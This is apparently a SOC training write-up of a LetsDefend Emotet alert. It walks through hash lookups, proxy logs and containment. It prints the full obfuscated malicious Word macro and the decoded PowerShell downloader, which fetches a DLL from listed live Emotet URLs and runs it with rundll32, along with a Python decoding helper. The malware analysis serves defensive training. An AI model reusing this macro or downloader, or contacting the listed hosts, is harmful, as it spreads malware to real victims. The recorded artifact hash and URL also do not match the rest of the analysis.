4ensiX

I noticed that for the alert I had called an FP, I selected FP but it is displayed as TP.

LetsDefend level 1 alert SOC109 - Emotet Malware Detected event-id 39

Details

EventID: 39
Event Time: Jan. 1, 2021, 4:45 p.m.
Rule: SOC109 - Emotet Malware Detected
Level: Security Analyst
Source Address 172.16.17.83
Source Hostname Maxim
File Name MES 2020_12_31 S632974.doc
File Hash eee99e6d8ade9463dd206dfbad3485ea
File Size 161.36 Kb
Device Action Allowed
Download (Password:infected): eee99e6d8ade9463dd206dfbad3485ea.zip

Playbook

Define Threat Indicator

Answer: Other

Check if the malware is quarantined/cleaned

Device Action Allowed

Answer: Not Quarantined

Analyze Malware

eee99e6d8ade9463dd206dfbad3485ea

VirusTotal 47/62: https://www.virustotal.com/gui/file/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c
Hybrid Analysis: https://www.hybrid-analysis.com/sample/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c/5fefe8368593b70319655413
ANYRUN: https://app.any.run/tasks/5621decd-153d-4982-92c6-e7bddeafde2e/
Looking at VirusTotal, this appears to be known malware flagged by many vendors.
It runs a VBA macro and fetches a file from a remote server.

Looking at this file with oletools' olevba gives:

Private Sub Document_open()
Rscxe50kzk0uy8c57h
End Sub
---
Function Rscxe50kzk0uy8c57h()
On Error Resume Next
mKbjhqs = Yfz878jqfi8emxj8k.StoryRanges.Item(4 / 4)
   GoTo GgbBEBHp
Dim agRmIUza As Object
Set agRmIUza = CreateObject("Scripting.FileSystemObject")
Dim GgbBEBHp As Object
Set GgbBEBHp = agRmIUza.CreateTextFile("K:\hHLZv\tivKHBG.fyEWE")
GgbBEBHp.WriteLine " "
GgbBEBHp.Close
Set agRmIUza = Nothing
Set GgbBEBHp = Nothing
GgbBEBHp:
snahbsd = "]e1r[Sp]e1r[S"
Lq83qqs1pfyjio1yve = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
   GoTo XgvEJCBN
Dim QziRLaIvB As Object
Set QziRLaIvB = CreateObject("Scripting.FileSystemObject")
Dim XgvEJCBN As Object
Set XgvEJCBN = QziRLaIvB.CreateTextFile("K:\ngiHBhtC\UfeKFo.VughFHEh")
XgvEJCBN.WriteLine " "
XgvEJCBN.Close
Set QziRLaIvB = Nothing
Set XgvEJCBN = Nothing
XgvEJCBN:
U5loi1_jmnzaqiegq = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
   GoTo hgtMNEDC
Dim CZSeKtG As Object
Set CZSeKtG = CreateObject("Scripting.FileSystemObject")
Dim hgtMNEDC As Object
Set hgtMNEDC = CZSeKtG.CreateTextFile("K:\cpFBJFDH\xlJbHCC.QYTeJIEGD")
hgtMNEDC.WriteLine " "
hgtMNEDC.Close
Set CZSeKtG = Nothing
Set hgtMNEDC = Nothing
hgtMNEDC:
H_7tattyau5usczkpn = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
   GoTo KiKEBuJUJ
Dim PTQDJLrW As Object
Set PTQDJLrW = CreateObject("Scripting.FileSystemObject")
Dim KiKEBuJUJ As Object
Set KiKEBuJUJ = PTQDJLrW.CreateTextFile("K:\soeBQFQDw\WMRIMPG.JKyoFAF")
KiKEBuJUJ.WriteLine " "
KiKEBuJUJ.Close
Set PTQDJLrW = Nothing
Set KiKEBuJUJ = Nothing
KiKEBuJUJ:
B0r8pge9ex02he = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
   GoTo VvbAPGB
Dim wHaMWCAF As Object
Set wHaMWCAF = CreateObject("Scripting.FileSystemObject")
Dim VvbAPGB As Object
Set VvbAPGB = wHaMWCAF.CreateTextFile("K:\bzWJHl\KFaka.azsvpH")
VvbAPGB.WriteLine " "
VvbAPGB.Close
Set wHaMWCAF = Nothing
Set VvbAPGB = Nothing
VvbAPGB:
Opoqhvp43yj = H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd + Lq83qqs1pfyjio1yve
   GoTo eNfOI
Dim EatwI As Object
Set EatwI = CreateObject("Scripting.FileSystemObject")
Dim eNfOI As Object
Set eNfOI = EatwI.CreateTextFile("K:\rThUJp\jvUYFCcC.bwpqgxnl")
eNfOI.WriteLine " "
eNfOI.Close
Set EatwI = Nothing
Set eNfOI = Nothing
eNfOI:
Z13pi8fctd_bd7 = H_f1l3q4wuv(Opoqhvp43yj)
   GoTo mttHC
Dim ZUSgTSS As Object
Set ZUSgTSS = CreateObject("Scripting.FileSystemObject")
Dim mttHC As Object
Set mttHC = ZUSgTSS.CreateTextFile("K:\tRMsNA\ZxNIJGBC.emQhvJFE")
mttHC.WriteLine " "
mttHC.Close
Set ZUSgTSS = Nothing
Set mttHC = Nothing
mttHC:
Set M3zy0l7te6wcqq4_r = CreateObject(Z13pi8fctd_bd7)
   GoTo XCtMEEHQH
Dim JEnFGGAH As Object
Set JEnFGGAH = CreateObject("Scripting.FileSystemObject")
Dim XCtMEEHQH As Object
Set XCtMEEHQH = JEnFGGAH.CreateTextFile("K:\KUvdSiCG\SWvOUGCM.yuplAASB")
XCtMEEHQH.WriteLine " "
XCtMEEHQH.Close
Set JEnFGGAH = Nothing
Set XCtMEEHQH = Nothing
XCtMEEHQH:
Px4akgkluolo7in096 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs))
   GoTo pHBuBEG
Dim gSXBEs As Object
Set gSXBEs = CreateObject("Scripting.FileSystemObject")
Dim pHBuBEG As Object
Set pHBuBEG = gSXBEs.CreateTextFile("K:\TskVJVn\aafpAJrAE.vUXKLFw")
pHBuBEG.WriteLine " "
pHBuBEG.Close
Set gSXBEs = Nothing
Set pHBuBEG = Nothing
pHBuBEG:
   GoTo cxLTHBCC
Dim aNVjIUF As Object
Set aNVjIUF = CreateObject("Scripting.FileSystemObject")
Dim cxLTHBCC As Object
Set cxLTHBCC = aNVjIUF.CreateTextFile("K:\WJmHGBxDH\atxzHEHY.mWWMoDHPG")
cxLTHBCC.WriteLine " "
cxLTHBCC.Close
Set aNVjIUF = Nothing
Set cxLTHBCC = Nothing
cxLTHBCC:
M3zy0l7te6wcqq4_r.Create H_f1l3q4wuv(Px4akgkluolo7in096), Rzvbvgf_vxrf, I3hfd4821r3zv
   GoTo pyPIA
Dim qhLiwn As Object
Set qhLiwn = CreateObject("Scripting.FileSystemObject")
Dim pyPIA As Object
Set pyPIA = qhLiwn.CreateTextFile("K:\GGDxTNF\IePRJDt.eCBBOz")
pyPIA.WriteLine " "
pyPIA.Close
Set qhLiwn = Nothing
Set pyPIA = Nothing
pyPIA:
   GoTo YiaTHFMA
Dim LPMlGRFHC As Object
Set LPMlGRFHC = CreateObject("Scripting.FileSystemObject")
Dim YiaTHFMA As Object
Set YiaTHFMA = LPMlGRFHC.CreateTextFile("K:\fFLaGYBH\ZvDXsFT.IXtjnt")
YiaTHFMA.WriteLine " "
YiaTHFMA.Close
Set LPMlGRFHC = Nothing
Set YiaTHFMA = Nothing
YiaTHFMA:
End Function
Function H_f1l3q4wuv(H11p8eic2w3zn_)
On Error Resume Next
   GoTo jkZdJG
Dim mfixAuM As Object
Set mfixAuM = CreateObject("Scripting.FileSystemObject")
Dim jkZdJG As Object
Set jkZdJG = mfixAuM.CreateTextFile("K:\bVbhWbGD\jTqgJ.GHrZkJCF")
jkZdJG.WriteLine " "
jkZdJG.Close
Set mfixAuM = Nothing
Set jkZdJG = Nothing
jkZdJG:
Bfizqcunyu0 = (H11p8eic2w3zn_)
   GoTo SeNkICAJ
Dim HRDLEVmi As Object
Set HRDLEVmi = CreateObject("Scripting.FileSystemObject")
Dim SeNkICAJ As Object
Set SeNkICAJ = HRDLEVmi.CreateTextFile("K:\AkYbFA\BnmqHkXA.oujVB")
SeNkICAJ.WriteLine " "
SeNkICAJ.Close
Set HRDLEVmi = Nothing
Set SeNkICAJ = Nothing
SeNkICAJ:
P_eiv2i047gos2b = Zh7kypwwff0md33a(Bfizqcunyu0)
   GoTo ZyJBNBD
Dim kIuKr As Object
Set kIuKr = CreateObject("Scripting.FileSystemObject")
Dim ZyJBNBD As Object
Set ZyJBNBD = kIuKr.CreateTextFile("K:\inSuIwND\usjkXC.fwloXI")
ZyJBNBD.WriteLine " "
ZyJBNBD.Close
Set kIuKr = Nothing
Set ZyJBNBD = Nothing
ZyJBNBD:
H_f1l3q4wuv = P_eiv2i047gos2b
   GoTo qoPKJgV
Dim naVxBFJAJ As Object
Set naVxBFJAJ = CreateObject("Scripting.FileSystemObject")
Dim qoPKJgV As Object
Set qoPKJgV = naVxBFJAJ.CreateTextFile("K:\JhzlFCAB\Jfiuz.aptrJGAA")
qoPKJgV.WriteLine " "
qoPKJgV.Close
Set naVxBFJAJ = Nothing
Set qoPKJgV = Nothing
qoPKJgV:
End Function
Function Zh7kypwwff0md33a(L34u2dzesgzcfaiwy)
Zlnor_53jwsrz = Ziq909ju8euif9uz
   GoTo HQnFde
Dim aNITDI As Object
Set aNITDI = CreateObject("Scripting.FileSystemObject")
Dim HQnFde As Object
Set HQnFde = aNITDI.CreateTextFile("K:\RMIpGDjgI\TjPglA.JFIpEFW")
HQnFde.WriteLine " "
HQnFde.Close
Set aNITDI = Nothing
Set HQnFde = Nothing
HQnFde:
Zh7kypwwff0md33a = Replace(L34u2dzesgzcfaiwy, "]e1r[S", Rnclsjpi29gic5)
   GoTo UMVjHQHCH
Dim gscDYEBhG As Object
Set gscDYEBhG = CreateObject("Scripting.FileSystemObject")
Dim UMVjHQHCH As Object
Set UMVjHQHCH = gscDYEBhG.CreateTextFile("K:\yJFQHkpC\FiUeelAjF.QixxE")
UMVjHQHCH.WriteLine " "
UMVjHQHCH.Close
Set gscDYEBhG = Nothing
Set UMVjHQHCH = Nothing
UMVjHQHCH:
End Function

This VBA most likely executes the following command.

cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  P^Ow^er^she^L^L -w hidden -ENCOD [base64 of the UTF-16LE script decoded below]

The PowerShell command being executed is:

SET-itEm  ('v'+'ArIa'+'b'+'LE:tIS8'+'Cq')  ([tyPE]("{0}{3}{5}{4}{1}{2}" -f's','.DIR','ECTORy','yStem','IO','.')  )  ;   SEt-item VARiaBle:85Y ([TYPE]("{5}{3}{2}{8}{1}{0}{4}{9}{7}{6}" -F 'r','.Se','M.','TE','VICePO','syS','aNaGer','TM','NeT','In')) ;$ErrorActionPreference = (('S'+'ilen'+'tl')+'yC'+('ontin'+'u')+'e');$Gmlthp7=$B76C + [char](64) + $P46X;$T37Y=(('D'+'35')+'I');  $TIs8Cq::"CrE`At`EdIrec`TOrY"($HOME + ((('G6'+'T'+'F2s')+('2k'+'3m')+('G6T'+'Jw')+'w9'+'w_'+'bG'+'6T') -rEPlace([ChaR]71+[ChaR]54+[ChaR]84),[ChaR]92));$U04Z=('F'+('57'+'U')); ( vARiAbLe  85y  -ValueO)::"seCUr`i`TYpROtO`cOl" = ('Tl'+('s1'+'2'));$J34O=('Q0'+'9A');$T4w3gou = ('L'+('_'+'0E'));$D05Q=('T2'+'8L');$Odwumkx=$HOME+(('{0}F2s'+('2'+'k3')+'m{0}Jww'+('9w'+'_b')+'{0'+'}') -F[cHAR]92)+$T4w3gou+(('.d'+'l')+'l');$E37Q=(('E'+'98')+'H');$Azgl82n=((']e1'+'r')+('['+'S://')+'de'+'c'+('p'+'ak.c')+'o'+('m'+'/cg')+('i'+'-bin/gU'+'/@]')+('e'+'1r')+'[S'+':'+'/'+('/a'+'n')+('gel'+'sl')+('li'+'m')+('a'+'r'+'gas.com/A'+'UD')+('I'+'O/3d')+('wm/@'+']'+'e1'+'r[')+('S'+'://g')+('ad'+'g')+'e'+('tb'+'ay.')+('co'+'m')+'/l'+('etsd'+'e'+'al/g'+'dFjfQ/@')+(']'+'e1')+('r[S'+'s')+(':'+'//cs'+'gcarg'+'o'+'.com/conte'+'nt')+('/Gb/'+'@'+']e1r')+'['+('S:/'+'/')+'a'+('a'+'gzz')+'.c'+'o'+('m/wp'+'-con'+'te')+'nt'+'/K'+('P'+'/@')+(']e'+'1r[Ss'+':')+('//meta'+'d')+'or'+('r'+'.c')+('om/'+'ALFA')+'_'+('DA'+'TA/')+'Bt'+('fM'+'8')+('I'+'d/@]e1'+'r['+'S'+'s://s')+'e'+'n'+('turk'+'e')+('ti'+'caret.co'+'m/'+'wp'+'-ad')+('min'+'/yO'+'l/'))."Rep`L`Ace"((']'+'e1'+('r['+'S')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."Spl`it"($M01L + $Gmlthp7 + $G55S);$U12Y=('I_'+'0I');foreach ($Xrc_t6r in $Azgl82n){try{(&('New-O'+'b'+'ject') sySTem.Net.WEbclieNt)."Do`WNLOadfI`Le"($Xrc_t6r, $Odwumkx);$E70P=('J'+('42'+'C'));If ((.('Get-'+'Ite'+'m') $Odwumkx)."LeNg`TH" -ge 39163) {&('rund'+'l'+'l32') $Odwumkx,('C'+('on'+'t')+('ro'+'l_Ru')+'n'+('DL'+'L'))."tO`sT`RING"();$G65O=(('W_'+'4')+'F');break;$T_4F=('D7'+'4P')}}catch{}}$V55O=('A'+('5'+'2Z'))
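As an added example (not code from the original post), the deobfuscation steps above reproduced in Python: the macro's marker-stripping that recovers the CreateObject() target, the UTF-16LE base64 decode of the -ENCOD argument (only its first 24 characters are embedded here), and the Replace/Split in the PowerShell stage that yields the download URL list. It assumes Application.Name is "Microsoft Word", so Mid(Application.Name, 6, 1) is "s".

```python
import base64

# Junk marker that both the macro and the PowerShell stage splice into strings.
MARKER = "]e1r[S"

# Fragments copied from the olevba output, in the order the macro concatenates
# them (H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd +
# Lq83qqs1pfyjio1yve). Mid(Application.Name, 6, 1) is assumed to be "s".
VBA_FRAGMENTS = [
    "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S",
    "]e1r[S" + "s" + "]e1r[S",
    "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S",
    "]e1r[Sp]e1r[S",
    "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S",
]

# $Azgl82n from the decoded PowerShell, with its ('a'+'b') concatenations folded.
PS_URL_BLOB = (
    "]e1r[S://decpak.com/cgi-bin/gU/@]e1r[S://angelsllimargas.com/AUDIO/3dwm/@"
    "]e1r[S://gadgetbay.com/letsdeal/gdFjfQ/@]e1r[Ss://csgcargo.com/content/Gb/@"
    "]e1r[S://aagzz.com/wp-content/KP/@]e1r[Ss://metadorr.com/ALFA_DATA/BtfM8Id/@"
    "]e1r[Ss://senturketicaret.com/wp-admin/yOl/"
)

# First 24 base64 characters of this sample's -ENCOD argument (18 bytes, 9 chars).
ENCOD_PREFIX = "UwBFAFQALQBpAHQARQBtACAA"


def vba_createobject_target(fragments: list[str]) -> str:
    """Zh7kypwwff0md33a replaces MARKER with an undeclared variable (Empty), i.e.
    with nothing, so the CreateObject() argument is the concatenation minus markers."""
    return "".join(fragments).replace(MARKER, "")


def ps_download_urls(blob: str, sep: str = "@") -> list[str]:
    """The script's Replace(MARKER, 'http') followed by Split('@'): $Gmlthp7 is
    [char]64 flanked by two undefined variables, hence a bare '@' separator."""
    return [u for u in blob.replace(MARKER, "http").split(sep) if u]


def decode_encoded_command(b64: str) -> str:
    """powershell -EncodedCommand takes base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


if __name__ == "__main__":
    print(vba_createobject_target(VBA_FRAGMENTS))  # winmgmts:win32_process
    print(decode_encoded_command(ENCOD_PREFIX))    # SET-itEm
    for url in ps_download_urls(PS_URL_BLOB):
        print(url)
```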

This script tries to fetch something from the following URLs.

http://decpak.com/cgi-bin/gU/
http://angelsllimargas.com/AUDIO/3dwm/
http://gadgetbay.com/letsdeal/gdFjfQ/
https://csgcargo.com/content/Gb/
http://aagzz.com/wp-content/KP/
https://metadorr.com/ALFA_DATA/BtfM8Id/
https://senturketicaret.com/wp-admin/yOl/

Looking up these URLs, for example:

http[:]//decpak.com/cgi-bin/gU/

URLhaus: https://urlhaus.abuse.ch/url/945783/
Emotet!!!

Answer: Malicious

Check If Someone Requested the C2

Log search - 172.16.17.83

Look at the access from 172.16.17.83.

# DATE TYPE SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT
330 Jan, 01, 2021, 04:41 PM Proxy 172.16.17.83 14441 23.111.174.153 80
331 Jan, 01, 2021, 04:42 PM Proxy 172.16.17.83 15431 152.170.79.100 80
332 Jan, 01, 2021, 04:43 PM Proxy 172.16.17.83 23121 190.247.139.101 80

330

URL: http://decpak.com/cgi-bin/gU/
Request Method: GET

331

URL: http://152.170.79.100/076ay2uof/umojx2x1vf1qjjk/hue4e670x/d3eobn8z0k0rp/syaxabx0loj/erz7hayf/
Request Method: GET

332

URL: http://190.247.139.101/i3u3l3e3n96/sow63klj/pkv3runqw/dudwqjl4zg8l7hk6ah6/huulsuajy/nibyefksabf1mz63/
Request Method: GET

Access to the Emotet-related server listed earlier was confirmed.
Also, looking up 152.170.79.100 and 190.247.139.101 on VirusTotal,
152.170.79.100: https://www.virustotal.com/gui/ip-address/152.170.79.100/community
190.247.139.101: https://www.virustotal.com/gui/ip-address/190.247.139.101/community
there are reports linking them to Emotet.

Answer: Accessed

Containment

Endpoint - Maxim 172.16.17.83

CMD History

01.01.2021 10:21: ipconfig
01.01.2021 10:22: netsh interface ipv4 show config
01.01.2021 10:23: arp -a

Network information gathering by Emotet?

Network Connections

01.01.2021 16:21: 172.217.169.174
01.01.2021 16:22: 172.217.169.174
01.01.2021 16:23: 172.217.169.174
01.01.2021 16:42: 152.170.79.100
01.01.2021 16:43: 190.247.139.101

172.217.169.174 looks fine.

Add Artifacts

Value Type Comment
f2d0c66b801244c059f636d08a474079 MD5 Hash malicious word file
https[:]//filetransfer[.]io/data-package/UR2whuBv/download URL Address file sending service

End

close alert event-id 39

Recent malware really does seem to be dominated by Emotet. Uploads to ANY.RUN in 2021 appear to have been mostly njRAT, but my impression is that in terms of actual infection counts and damage, Emotet is the more common one.
https://any.run/cybersecurity-blog/annual-report-2021/